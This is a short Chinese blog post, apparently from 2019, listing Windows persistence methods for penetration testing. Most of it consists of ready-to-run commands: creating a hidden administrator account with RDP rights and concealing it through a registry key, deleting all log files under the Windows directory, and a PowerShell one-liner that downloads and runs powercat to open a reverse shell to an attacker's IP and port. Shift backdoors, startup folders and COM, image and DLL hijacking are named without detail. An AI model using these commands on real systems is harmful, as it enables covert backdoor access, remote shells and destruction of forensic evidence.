渗透测试之权限维持的方法

权限维持的方法

基本上现在常见的方法有以下几种：

1、隐藏、克隆账户

windows 隐藏账户

net localgroup “Domain Admin” test$ /add

net user test$ test /add
net localgroup Administrators test$ /add
net localgroup "Remote Desktop Users" test$ /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v test$ /T REG_DWORD /D 0
net user test$ /del
del %WINDIR%\*.log /a/s/q/f 删除所有日志文件
2、shift后门
3、启动项、计划任务
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup

4、劫持技术
com劫持
映像劫持：改注册表，debugger
dll劫持，clr
5、Powershell后门
powershell IEX (New-Object

System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd

详细步骤链接：https://www.cnblogs.com/xiaozi/p/7613288.html

posted @ 2019-11-11 15:56 斑林鸽的代码世界阅读(596) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

World peace

技术可以改变世界，推动世界，也能毁灭世界& 在路上，且行且珍惜！

渗透测试之权限维持的方法

公告